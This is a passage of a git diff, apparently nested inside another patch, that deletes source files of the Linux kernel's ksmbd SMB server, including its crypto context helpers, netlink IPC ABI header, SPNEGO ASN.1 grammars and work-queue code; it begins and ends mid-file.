+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha256(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_SHA256);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha512(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_SHA512);
+-}
+-
+-static struct ksmbd_crypto_ctx *____crypto_aead_ctx_find(int id)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	if (id >= CRYPTO_AEAD_MAX)
+-		return NULL;
+-
+-	ctx = ksmbd_find_crypto_ctx();
+-	if (ctx->ccmaes[id])
+-		return ctx;
+-
+-	ctx->ccmaes[id] = alloc_aead(id);
+-	if (ctx->ccmaes[id])
+-		return ctx;
+-	ksmbd_release_crypto_ctx(ctx);
+-	return NULL;
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_gcm(void)
+-{
+-	return ____crypto_aead_ctx_find(CRYPTO_AEAD_AES_GCM);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_ccm(void)
+-{
+-	return ____crypto_aead_ctx_find(CRYPTO_AEAD_AES_CCM);
+-}
+-
+-void ksmbd_crypto_destroy(void)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	while (!list_empty(&ctx_list.idle_ctx)) {
+-		ctx = list_entry(ctx_list.idle_ctx.next,
+-				 struct ksmbd_crypto_ctx,
+-				 list);
+-		list_del(&ctx->list);
+-		ctx_free(ctx);
+-	}
+-}
+-
+-int ksmbd_crypto_create(void)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	spin_lock_init(&ctx_list.ctx_lock);
+-	INIT_LIST_HEAD(&ctx_list.idle_ctx);
+-	init_waitqueue_head(&ctx_list.ctx_wait);
+-	ctx_list.avail_ctx = 1;
+-
+-	ctx = kzalloc(sizeof(struct ksmbd_crypto_ctx), GFP_KERNEL);
+-	if (!ctx)
+-		return -ENOMEM;
+-	list_add(&ctx->list, &ctx_list.idle_ctx);
+-	return 0;
+-}
+diff --git a/fs/ksmbd/crypto_ctx.h b/fs/ksmbd/crypto_ctx.h
+deleted file mode 100644
+index 4a367c62f6536..0000000000000
+--- a/fs/ksmbd/crypto_ctx.h
++++ /dev/null
+@@ -1,66 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __CRYPTO_CTX_H__
+-#define __CRYPTO_CTX_H__
+-
+-#include <crypto/hash.h>
+-#include <crypto/aead.h>
+-
+-enum {
+-	CRYPTO_SHASH_HMACMD5	= 0,
+-	CRYPTO_SHASH_HMACSHA256,
+-	CRYPTO_SHASH_CMACAES,
+-	CRYPTO_SHASH_SHA256,
+-	CRYPTO_SHASH_SHA512,
+-	CRYPTO_SHASH_MAX,
+-};
+-
+-enum {
+-	CRYPTO_AEAD_AES_GCM = 16,
+-	CRYPTO_AEAD_AES_CCM,
+-	CRYPTO_AEAD_MAX,
+-};
+-
+-enum {
+-	CRYPTO_BLK_ECBDES	= 32,
+-	CRYPTO_BLK_MAX,
+-};
+-
+-struct ksmbd_crypto_ctx {
+-	struct list_head		list;
+-
+-	struct shash_desc		*desc[CRYPTO_SHASH_MAX];
+-	struct crypto_aead		*ccmaes[CRYPTO_AEAD_MAX];
+-};
+-
+-#define CRYPTO_HMACMD5(c)	((c)->desc[CRYPTO_SHASH_HMACMD5])
+-#define CRYPTO_HMACSHA256(c)	((c)->desc[CRYPTO_SHASH_HMACSHA256])
+-#define CRYPTO_CMACAES(c)	((c)->desc[CRYPTO_SHASH_CMACAES])
+-#define CRYPTO_SHA256(c)	((c)->desc[CRYPTO_SHASH_SHA256])
+-#define CRYPTO_SHA512(c)	((c)->desc[CRYPTO_SHASH_SHA512])
+-
+-#define CRYPTO_HMACMD5_TFM(c)	((c)->desc[CRYPTO_SHASH_HMACMD5]->tfm)
+-#define CRYPTO_HMACSHA256_TFM(c)\
+-				((c)->desc[CRYPTO_SHASH_HMACSHA256]->tfm)
+-#define CRYPTO_CMACAES_TFM(c)	((c)->desc[CRYPTO_SHASH_CMACAES]->tfm)
+-#define CRYPTO_SHA256_TFM(c)	((c)->desc[CRYPTO_SHASH_SHA256]->tfm)
+-#define CRYPTO_SHA512_TFM(c)	((c)->desc[CRYPTO_SHASH_SHA512]->tfm)
+-
+-#define CRYPTO_GCM(c)		((c)->ccmaes[CRYPTO_AEAD_AES_GCM])
+-#define CRYPTO_CCM(c)		((c)->ccmaes[CRYPTO_AEAD_AES_CCM])
+-
+-void ksmbd_release_crypto_ctx(struct ksmbd_crypto_ctx *ctx);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacmd5(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacsha256(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_cmacaes(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha512(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha256(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_gcm(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_ccm(void);
+-void ksmbd_crypto_destroy(void);
+-int ksmbd_crypto_create(void);
+-
+-#endif /* __CRYPTO_CTX_H__ */
+diff --git a/fs/ksmbd/glob.h b/fs/ksmbd/glob.h
+deleted file mode 100644
+index 5b8f3e0ebdb36..0000000000000
+--- a/fs/ksmbd/glob.h
++++ /dev/null
+@@ -1,49 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_GLOB_H
+-#define __KSMBD_GLOB_H
+-
+-#include <linux/ctype.h>
+-
+-#include "unicode.h"
+-#include "vfs_cache.h"
+-
+-#define KSMBD_VERSION	"3.4.2"
+-
+-extern int ksmbd_debug_types;
+-
+-#define KSMBD_DEBUG_SMB		BIT(0)
+-#define KSMBD_DEBUG_AUTH	BIT(1)
+-#define KSMBD_DEBUG_VFS		BIT(2)
+-#define KSMBD_DEBUG_OPLOCK      BIT(3)
+-#define KSMBD_DEBUG_IPC         BIT(4)
+-#define KSMBD_DEBUG_CONN        BIT(5)
+-#define KSMBD_DEBUG_RDMA        BIT(6)
+-#define KSMBD_DEBUG_ALL         (KSMBD_DEBUG_SMB | KSMBD_DEBUG_AUTH |	\
+-				KSMBD_DEBUG_VFS | KSMBD_DEBUG_OPLOCK |	\
+-				KSMBD_DEBUG_IPC | KSMBD_DEBUG_CONN |	\
+-				KSMBD_DEBUG_RDMA)
+-
+-#ifdef pr_fmt
+-#undef pr_fmt
+-#endif
+-
+-#ifdef SUBMOD_NAME
+-#define pr_fmt(fmt)	"ksmbd: " SUBMOD_NAME ": " fmt
+-#else
+-#define pr_fmt(fmt)	"ksmbd: " fmt
+-#endif
+-
+-#define ksmbd_debug(type, fmt, ...)				\
+-	do {							\
+-		if (ksmbd_debug_types & KSMBD_DEBUG_##type)	\
+-			pr_info(fmt, ##__VA_ARGS__);		\
+-	} while (0)
+-
+-#define UNICODE_LEN(x)		((x) * 2)
+-
+-#endif /* __KSMBD_GLOB_H */
+diff --git a/fs/ksmbd/ksmbd_netlink.h b/fs/ksmbd/ksmbd_netlink.h
+deleted file mode 100644
+index ce866ff159bfe..0000000000000
+--- a/fs/ksmbd/ksmbd_netlink.h
++++ /dev/null
+@@ -1,412 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- *
+- *   linux-ksmbd-devel@lists.sourceforge.net
+- */
+-
+-#ifndef _LINUX_KSMBD_SERVER_H
+-#define _LINUX_KSMBD_SERVER_H
+-
+-#include <linux/types.h>
+-
+-/*
+- * This is a userspace ABI to communicate data between ksmbd and user IPC
+- * daemon using netlink. This is added to track and cache user account DB
+- * and share configuration info from userspace.
+- *
+- *  - KSMBD_EVENT_HEARTBEAT_REQUEST(ksmbd_heartbeat)
+- *    This event is to check whether user IPC daemon is alive. If user IPC
+- *    daemon is dead, ksmbd keep existing connection till disconnecting and
+- *    new connection will be denied.
+- *
+- *  - KSMBD_EVENT_STARTING_UP(ksmbd_startup_request)
+- *    This event is to receive the information that initializes the ksmbd
+- *    server from the user IPC daemon and to start the server. The global
+- *    section parameters are given from smb.conf as initialization
+- *    information.
+- *
+- *  - KSMBD_EVENT_SHUTTING_DOWN(ksmbd_shutdown_request)
+- *    This event is to shutdown ksmbd server.
+- *
+- *  - KSMBD_EVENT_LOGIN_REQUEST/RESPONSE(ksmbd_login_request/response)
+- *    This event is to get user account info to user IPC daemon.
+- *
+- *  - KSMBD_EVENT_SHARE_CONFIG_REQUEST/RESPONSE(ksmbd_share_config_request/response)
+- *    This event is to get net share configuration info.
+- *
+- *  - KSMBD_EVENT_TREE_CONNECT_REQUEST/RESPONSE(ksmbd_tree_connect_request/response)
+- *    This event is to get session and tree connect info.
+- *
+- *  - KSMBD_EVENT_TREE_DISCONNECT_REQUEST(ksmbd_tree_disconnect_request)
+- *    This event is to send tree disconnect info to user IPC daemon.
+- *
+- *  - KSMBD_EVENT_LOGOUT_REQUEST(ksmbd_logout_request)
+- *    This event is to send logout request to user IPC daemon.
+- *
+- *  - KSMBD_EVENT_RPC_REQUEST/RESPONSE(ksmbd_rpc_command)
+- *    This event is to make DCE/RPC request like srvsvc, wkssvc, lsarpc,
+- *    samr to be processed in userspace.
+- *
+- *  - KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST/RESPONSE(ksmbd_spnego_authen_request/response)
+- *    This event is to make kerberos authentication to be processed in
+- *    userspace.
+- */
+-
+-#define KSMBD_GENL_NAME		"SMBD_GENL"
+-#define KSMBD_GENL_VERSION		0x01
+-
+-#define KSMBD_REQ_MAX_ACCOUNT_NAME_SZ	48
+-#define KSMBD_REQ_MAX_HASH_SZ		18
+-#define KSMBD_REQ_MAX_SHARE_NAME	64
+-
+-/*
+- * IPC heartbeat frame to check whether user IPC daemon is alive.
+- */
+-struct ksmbd_heartbeat {
+-	__u32	handle;
+-};
+-
+-/*
+- * Global config flags.
+- */
+-#define KSMBD_GLOBAL_FLAG_INVALID		(0)
+-#define KSMBD_GLOBAL_FLAG_SMB2_LEASES		BIT(0)
+-#define KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION	BIT(1)
+-#define KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL	BIT(2)
+-
+-/*
+- * IPC request for ksmbd server startup
+- */
+-struct ksmbd_startup_request {
+-	__u32	flags;			/* Flags for global config */
+-	__s32	signing;		/* Signing enabled */
+-	__s8	min_prot[16];		/* The minimum SMB protocol version */
+-	__s8	max_prot[16];		/* The maximum SMB protocol version */
+-	__s8	netbios_name[16];
+-	__s8	work_group[64];		/* Workgroup */
+-	__s8	server_string[64];	/* Server string */
+-	__u16	tcp_port;		/* tcp port */
+-	__u16	ipc_timeout;		/*
+-					 * specifies the number of seconds
+-					 * server will wait for the userspace to
+-					 * reply to heartbeat frames.
+-					 */
+-	__u32	deadtime;		/* Number of minutes of inactivity */
+-	__u32	file_max;		/* Limits the maximum number of open files */
+-	__u32	smb2_max_write;		/* MAX write size */
+-	__u32	smb2_max_read;		/* MAX read size */
+-	__u32	smb2_max_trans;		/* MAX trans size */
+-	__u32	share_fake_fscaps;	/*
+-					 * Support some special application that
+-					 * makes QFSINFO calls to check whether
+-					 * we set the SPARSE_FILES bit (0x40).
+-					 */
+-	__u32	sub_auth[3];		/* Subauth value for Security ID */
+-	__u32	smb2_max_credits;	/* MAX credits */
+-	__u32	smbd_max_io_size;	/* smbd read write size */
+-	__u32	max_connections;	/* Number of maximum simultaneous connections */
+-	__u32	reserved[126];		/* Reserved room */
+-	__u32	ifc_list_sz;		/* interfaces list size */
+-	__s8	____payload[];
+-};
+-
+-#define KSMBD_STARTUP_CONFIG_INTERFACES(s)	((s)->____payload)
+-
+-/*
+- * IPC request to shutdown ksmbd server.
+- */
+-struct ksmbd_shutdown_request {
+-	__s32	reserved[16];
+-};
+-
+-/*
+- * IPC user login request.
+- */
+-struct ksmbd_login_request {
+-	__u32	handle;
+-	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
+-	__u32	reserved[16];				/* Reserved room */
+-};
+-
+-/*
+- * IPC user login response.
+- */
+-struct ksmbd_login_response {
+-	__u32	handle;
+-	__u32	gid;					/* group id */
+-	__u32	uid;					/* user id */
+-	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
+-	__u16	status;
+-	__u16	hash_sz;			/* hash size */
+-	__s8	hash[KSMBD_REQ_MAX_HASH_SZ];	/* password hash */
+-	__u32	reserved[16];			/* Reserved room */
+-};
+-
+-/*
+- * IPC request to fetch net share config.
+- */
+-struct ksmbd_share_config_request {
+-	__u32	handle;
+-	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME]; /* share name */
+-	__u32	reserved[16];		/* Reserved room */
+-};
+-
+-/*
+- * IPC response to the net share config request.
+- */
+-struct ksmbd_share_config_response {
+-	__u32	handle;
+-	__u32	flags;
+-	__u16	create_mask;
+-	__u16	directory_mask;
+-	__u16	force_create_mode;
+-	__u16	force_directory_mode;
+-	__u16	force_uid;
+-	__u16	force_gid;
+-	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME];
+-	__u32	reserved[112];		/* Reserved room */
+-	__u32	veto_list_sz;
+-	__s8	____payload[];
+-};
+-
+-#define KSMBD_SHARE_CONFIG_VETO_LIST(s)	((s)->____payload)
+-
+-static inline char *
+-ksmbd_share_config_path(struct ksmbd_share_config_response *sc)
+-{
+-	char *p = sc->____payload;
+-
+-	if (sc->veto_list_sz)
+-		p += sc->veto_list_sz + 1;
+-
+-	return p;
+-}
+-
+-/*
+- * IPC request for tree connection. This request include session and tree
+- * connect info from client.
+- */
+-struct ksmbd_tree_connect_request {
+-	__u32	handle;
+-	__u16	account_flags;
+-	__u16	flags;
+-	__u64	session_id;
+-	__u64	connect_id;
+-	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ];
+-	__s8	share[KSMBD_REQ_MAX_SHARE_NAME];
+-	__s8	peer_addr[64];
+-	__u32	reserved[16];		/* Reserved room */
+-};
+-
+-/*
+- * IPC Response structure for tree connection.
+- */
+-struct ksmbd_tree_connect_response {
+-	__u32	handle;
+-	__u16	status;
+-	__u16	connection_flags;
+-	__u32	reserved[16];		/* Reserved room */
+-};
+-
+-/*
+- * IPC Request struture to disconnect tree connection.
+- */
+-struct ksmbd_tree_disconnect_request {
+-	__u64	session_id;	/* session id */
+-	__u64	connect_id;	/* tree connection id */
+-	__u32	reserved[16];	/* Reserved room */
+-};
+-
+-/*
+- * IPC Response structure to logout user account.
+- */
+-struct ksmbd_logout_request {
+-	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
+-	__u32	account_flags;
+-	__u32	reserved[16];				/* Reserved room */
+-};
+-
+-/*
+- * RPC command structure to send rpc request like srvsvc or wkssvc to
+- * IPC user daemon.
+- */
+-struct ksmbd_rpc_command {
+-	__u32	handle;
+-	__u32	flags;
+-	__u32	payload_sz;
+-	__u8	payload[];
+-};
+-
+-/*
+- * IPC Request Kerberos authentication
+- */
+-struct ksmbd_spnego_authen_request {
+-	__u32	handle;
+-	__u16	spnego_blob_len;	/* the length of spnego_blob */
+-	__u8	spnego_blob[];		/*
+-					 * the GSS token from SecurityBuffer of
+-					 * SMB2 SESSION SETUP request
+-					 */
+-};
+-
+-/*
+- * Response data which includes the GSS token and the session key generated by
+- * user daemon.
+- */
+-struct ksmbd_spnego_authen_response {
+-	__u32	handle;
+-	struct ksmbd_login_response login_response; /*
+-						     * the login response with
+-						     * a user identified by the
+-						     * GSS token from a client
+-						     */
+-	__u16	session_key_len; /* the length of the session key */
+-	__u16	spnego_blob_len; /*
+-				  * the length of  the GSS token which will be
+-				  * stored in SecurityBuffer of SMB2 SESSION
+-				  * SETUP response
+-				  */
+-	__u8	payload[]; /* session key + AP_REP */
+-};
+-
+-/*
+- * This also used as NETLINK attribute type value.
+- *
+- * NOTE:
+- * Response message type value should be equal to
+- * request message type value + 1.
+- */
+-enum ksmbd_event {
+-	KSMBD_EVENT_UNSPEC			= 0,
+-	KSMBD_EVENT_HEARTBEAT_REQUEST,
+-
+-	KSMBD_EVENT_STARTING_UP,
+-	KSMBD_EVENT_SHUTTING_DOWN,
+-
+-	KSMBD_EVENT_LOGIN_REQUEST,
+-	KSMBD_EVENT_LOGIN_RESPONSE		= 5,
+-
+-	KSMBD_EVENT_SHARE_CONFIG_REQUEST,
+-	KSMBD_EVENT_SHARE_CONFIG_RESPONSE,
+-
+-	KSMBD_EVENT_TREE_CONNECT_REQUEST,
+-	KSMBD_EVENT_TREE_CONNECT_RESPONSE,
+-
+-	KSMBD_EVENT_TREE_DISCONNECT_REQUEST	= 10,
+-
+-	KSMBD_EVENT_LOGOUT_REQUEST,
+-
+-	KSMBD_EVENT_RPC_REQUEST,
+-	KSMBD_EVENT_RPC_RESPONSE,
+-
+-	KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
+-	KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE	= 15,
+-
+-	KSMBD_EVENT_MAX
+-};
+-
+-/*
+- * Enumeration for IPC tree connect status.
+- */
+-enum KSMBD_TREE_CONN_STATUS {
+-	KSMBD_TREE_CONN_STATUS_OK		= 0,
+-	KSMBD_TREE_CONN_STATUS_NOMEM,
+-	KSMBD_TREE_CONN_STATUS_NO_SHARE,
+-	KSMBD_TREE_CONN_STATUS_NO_USER,
+-	KSMBD_TREE_CONN_STATUS_INVALID_USER,
+-	KSMBD_TREE_CONN_STATUS_HOST_DENIED	= 5,
+-	KSMBD_TREE_CONN_STATUS_CONN_EXIST,
+-	KSMBD_TREE_CONN_STATUS_TOO_MANY_CONNS,
+-	KSMBD_TREE_CONN_STATUS_TOO_MANY_SESSIONS,
+-	KSMBD_TREE_CONN_STATUS_ERROR,
+-};
+-
+-/*
+- * User config flags.
+- */
+-#define KSMBD_USER_FLAG_INVALID		(0)
+-#define KSMBD_USER_FLAG_OK		BIT(0)
+-#define KSMBD_USER_FLAG_BAD_PASSWORD	BIT(1)
+-#define KSMBD_USER_FLAG_BAD_UID		BIT(2)
+-#define KSMBD_USER_FLAG_BAD_USER	BIT(3)
+-#define KSMBD_USER_FLAG_GUEST_ACCOUNT	BIT(4)
+-#define KSMBD_USER_FLAG_DELAY_SESSION	BIT(5)
+-
+-/*
+- * Share config flags.
+- */
+-#define KSMBD_SHARE_FLAG_INVALID		(0)
+-#define KSMBD_SHARE_FLAG_AVAILABLE		BIT(0)
+-#define KSMBD_SHARE_FLAG_BROWSEABLE		BIT(1)
+-#define KSMBD_SHARE_FLAG_WRITEABLE		BIT(2)
+-#define KSMBD_SHARE_FLAG_READONLY		BIT(3)
+-#define KSMBD_SHARE_FLAG_GUEST_OK		BIT(4)
+-#define KSMBD_SHARE_FLAG_GUEST_ONLY		BIT(5)
+-#define KSMBD_SHARE_FLAG_STORE_DOS_ATTRS	BIT(6)
+-#define KSMBD_SHARE_FLAG_OPLOCKS		BIT(7)
+-#define KSMBD_SHARE_FLAG_PIPE			BIT(8)
+-#define KSMBD_SHARE_FLAG_HIDE_DOT_FILES		BIT(9)
+-#define KSMBD_SHARE_FLAG_INHERIT_OWNER		BIT(10)
+-#define KSMBD_SHARE_FLAG_STREAMS		BIT(11)
+-#define KSMBD_SHARE_FLAG_FOLLOW_SYMLINKS	BIT(12)
+-#define KSMBD_SHARE_FLAG_ACL_XATTR		BIT(13)
+-#define KSMBD_SHARE_FLAG_UPDATE		BIT(14)
+-
+-/*
+- * Tree connect request flags.
+- */
+-#define KSMBD_TREE_CONN_FLAG_REQUEST_SMB1	(0)
+-#define KSMBD_TREE_CONN_FLAG_REQUEST_IPV6	BIT(0)
+-#define KSMBD_TREE_CONN_FLAG_REQUEST_SMB2	BIT(1)
+-
+-/*
+- * Tree connect flags.
+- */
+-#define KSMBD_TREE_CONN_FLAG_GUEST_ACCOUNT	BIT(0)
+-#define KSMBD_TREE_CONN_FLAG_READ_ONLY		BIT(1)
+-#define KSMBD_TREE_CONN_FLAG_WRITABLE		BIT(2)
+-#define KSMBD_TREE_CONN_FLAG_ADMIN_ACCOUNT	BIT(3)
+-#define KSMBD_TREE_CONN_FLAG_UPDATE		BIT(4)
+-
+-/*
+- * RPC over IPC.
+- */
+-#define KSMBD_RPC_METHOD_RETURN		BIT(0)
+-#define KSMBD_RPC_SRVSVC_METHOD_INVOKE	BIT(1)
+-#define KSMBD_RPC_SRVSVC_METHOD_RETURN	(KSMBD_RPC_SRVSVC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_WKSSVC_METHOD_INVOKE	BIT(2)
+-#define KSMBD_RPC_WKSSVC_METHOD_RETURN	(KSMBD_RPC_WKSSVC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_IOCTL_METHOD		(BIT(3) | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_OPEN_METHOD		BIT(4)
+-#define KSMBD_RPC_WRITE_METHOD		BIT(5)
+-#define KSMBD_RPC_READ_METHOD		(BIT(6) | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_CLOSE_METHOD		BIT(7)
+-#define KSMBD_RPC_RAP_METHOD		(BIT(8) | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_RESTRICTED_CONTEXT	BIT(9)
+-#define KSMBD_RPC_SAMR_METHOD_INVOKE	BIT(10)
+-#define KSMBD_RPC_SAMR_METHOD_RETURN	(KSMBD_RPC_SAMR_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_LSARPC_METHOD_INVOKE	BIT(11)
+-#define KSMBD_RPC_LSARPC_METHOD_RETURN	(KSMBD_RPC_LSARPC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
+-
+-/*
+- * RPC status definitions.
+- */
+-#define KSMBD_RPC_OK			0
+-#define KSMBD_RPC_EBAD_FUNC		0x00000001
+-#define KSMBD_RPC_EACCESS_DENIED	0x00000005
+-#define KSMBD_RPC_EBAD_FID		0x00000006
+-#define KSMBD_RPC_ENOMEM		0x00000008
+-#define KSMBD_RPC_EBAD_DATA		0x0000000D
+-#define KSMBD_RPC_ENOTIMPLEMENTED	0x00000040
+-#define KSMBD_RPC_EINVALID_PARAMETER	0x00000057
+-#define KSMBD_RPC_EMORE_DATA		0x000000EA
+-#define KSMBD_RPC_EINVALID_LEVEL	0x0000007C
+-#define KSMBD_RPC_SOME_NOT_MAPPED	0x00000107
+-
+-#define KSMBD_CONFIG_OPT_DISABLED	0
+-#define KSMBD_CONFIG_OPT_ENABLED	1
+-#define KSMBD_CONFIG_OPT_AUTO		2
+-#define KSMBD_CONFIG_OPT_MANDATORY	3
+-
+-#endif /* _LINUX_KSMBD_SERVER_H */
+diff --git a/fs/ksmbd/ksmbd_spnego_negtokeninit.asn1 b/fs/ksmbd/ksmbd_spnego_negtokeninit.asn1
+deleted file mode 100644
+index 0065f191b54b7..0000000000000
+--- a/fs/ksmbd/ksmbd_spnego_negtokeninit.asn1
++++ /dev/null
+@@ -1,31 +0,0 @@
+-GSSAPI ::=
+-	[APPLICATION 0] IMPLICIT SEQUENCE {
+-		thisMech
+-			OBJECT IDENTIFIER ({ksmbd_gssapi_this_mech}),
+-		negotiationToken
+-			NegotiationToken
+-	}
+-
+-MechType ::= OBJECT IDENTIFIER ({ksmbd_neg_token_init_mech_type})
+-
+-MechTypeList ::= SEQUENCE OF MechType
+-
+-NegTokenInit ::=
+-	SEQUENCE {
+-		mechTypes
+-			[0] MechTypeList,
+-		reqFlags
+-			[1] BIT STRING OPTIONAL,
+-		mechToken
+-			[2] OCTET STRING OPTIONAL ({ksmbd_neg_token_init_mech_token}),
+-		mechListMIC
+-			[3] OCTET STRING OPTIONAL
+-	}
+-
+-NegotiationToken ::=
+-	CHOICE {
+-		negTokenInit
+-			[0] NegTokenInit,
+-		negTokenTarg
+-			[1] ANY
+-	}
+diff --git a/fs/ksmbd/ksmbd_spnego_negtokentarg.asn1 b/fs/ksmbd/ksmbd_spnego_negtokentarg.asn1
+deleted file mode 100644
+index 1151933e7b9c5..0000000000000
+--- a/fs/ksmbd/ksmbd_spnego_negtokentarg.asn1
++++ /dev/null
+@@ -1,19 +0,0 @@
+-GSSAPI ::=
+-	CHOICE {
+-		negTokenInit
+-			[0] ANY,
+-		negTokenTarg
+-			[1] NegTokenTarg
+-	}
+-
+-NegTokenTarg ::=
+-	SEQUENCE {
+-		negResult
+-			[0] ENUMERATED OPTIONAL,
+-		supportedMech
+-			[1] OBJECT IDENTIFIER OPTIONAL,
+-		responseToken
+-			[2] OCTET STRING OPTIONAL ({ksmbd_neg_token_targ_resp_token}),
+-		mechListMIC
+-			[3] OCTET STRING OPTIONAL
+-	}
+diff --git a/fs/ksmbd/ksmbd_work.c b/fs/ksmbd/ksmbd_work.c
+deleted file mode 100644
+index 14b9caebf7a4f..0000000000000
+--- a/fs/ksmbd/ksmbd_work.c
++++ /dev/null
+@@ -1,79 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/list.h>
+-#include <linux/mm.h>
+-#include <linux/slab.h>
+-#include <linux/workqueue.h>
+-
+-#include "server.h"
+-#include "connection.h"
+-#include "ksmbd_work.h"
+-#include "mgmt/ksmbd_ida.h"
+-
+-static struct kmem_cache *work_cache;
+-static struct workqueue_struct *ksmbd_wq;
+-
+-struct ksmbd_work *ksmbd_alloc_work_struct(void)
+-{
+-	struct ksmbd_work *work = kmem_cache_zalloc(work_cache, GFP_KERNEL);
+-
+-	if (work) {
+-		work->compound_fid = KSMBD_NO_FID;
+-		work->compound_pfid = KSMBD_NO_FID;
+-		INIT_LIST_HEAD(&work->request_entry);
+-		INIT_LIST_HEAD(&work->async_request_entry);
+-		INIT_LIST_HEAD(&work->fp_entry);
+-		INIT_LIST_HEAD(&work->interim_entry);
+-	}
+-	return work;
+-}
+-
+-void ksmbd_free_work_struct(struct ksmbd_work *work)
+-{
+-	WARN_ON(work->saved_cred != NULL);
+-
+-	kvfree(work->response_buf);
+-	kvfree(work->aux_payload_buf);
+-	kfree(work->tr_buf);
+-	kvfree(work->request_buf);
+-	if (work->async_id)
+-		ksmbd_release_id(&work->conn->async_ida, work->async_id);
+-	kmem_cache_free(work_cache, work);
+-}
+-
+-void ksmbd_work_pool_destroy(void)
+-{
+-	kmem_cache_destroy(work_cache);
+-}
+-
+-int ksmbd_work_pool_init(void)
+-{
+-	work_cache = kmem_cache_create("ksmbd_work_cache",
+-				       sizeof(struct ksmbd_work), 0,
+-				       SLAB_HWCACHE_ALIGN, NULL);
+-	if (!work_cache)
+-		return -ENOMEM;
+-	return 0;
+-}
+-
+-int ksmbd_workqueue_init(void)
+-{
+-	ksmbd_wq = alloc_workqueue("ksmbd-io", 0, 0);
+-	if (!ksmbd_wq)
+-		return -ENOMEM;
+-	return 0;
+-}
+-
+-void ksmbd_workqueue_destroy(void)
+-{
+-	destroy_workqueue(ksmbd_wq);
+-	ksmbd_wq = NULL;
+-}
+-
+-bool ksmbd_queue_work(struct ksmbd_work *work)
+-{
+-	return queue_work(ksmbd_wq, &work->work);
+-}
+diff --git a/fs/ksmbd/ksmbd_work.h b/fs/ksmbd/ksmbd_work.h
+deleted file mode 100644
+index 5ece58e40c979..0000000000000
+--- a/fs/ksmbd/ksmbd_work.h
++++ /dev/null
+@@ -1,117 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_WORK_H__
+-#define __KSMBD_WORK_H__
+-
+-#include <linux/ctype.h>
+-#include <linux/workqueue.h>
+-
+-struct ksmbd_conn;
+-struct ksmbd_session;
+-struct ksmbd_tree_connect;
+-
+-enum {
+-	KSMBD_WORK_ACTIVE = 0,
+-	KSMBD_WORK_CANCELLED,
+-	KSMBD_WORK_CLOSED,
+-};
+-
+-/* one of these for every pending CIFS request at the connection */
+-struct ksmbd_work {
+-	/* Server corresponding to this mid */
+-	struct ksmbd_conn               *conn;
+-	struct ksmbd_session            *sess;
+-	struct ksmbd_tree_connect       *tcon;
+-
+-	/* Pointer to received SMB header */
+-	void                            *request_buf;
+-	/* Response buffer */
+-	void                            *response_buf;
+-
+-	/* Read data buffer */
+-	void                            *aux_payload_buf;
+-
+-	/* Next cmd hdr in compound req buf*/
+-	int                             next_smb2_rcv_hdr_off;
+-	/* Next cmd hdr in compound rsp buf*/
+-	int                             next_smb2_rsp_hdr_off;
+-
+-	/*
+-	 * Current Local FID assigned compound response if SMB2 CREATE
+-	 * command is present in compound request
+-	 */
+-	u64				compound_fid;
+-	u64				compound_pfid;
+-	u64				compound_sid;
+-
+-	const struct cred		*saved_cred;
+-
+-	/* Number of granted credits */
+-	unsigned int			credits_granted;
+-
+-	/* response smb header size */
+-	unsigned int                    resp_hdr_sz;
+-	unsigned int                    response_sz;
+-	/* Read data count */
+-	unsigned int                    aux_payload_sz;
+-
+-	void				*tr_buf;
+-
+-	unsigned char			state;
+-	/* Multiple responses for one request e.g. SMB ECHO */
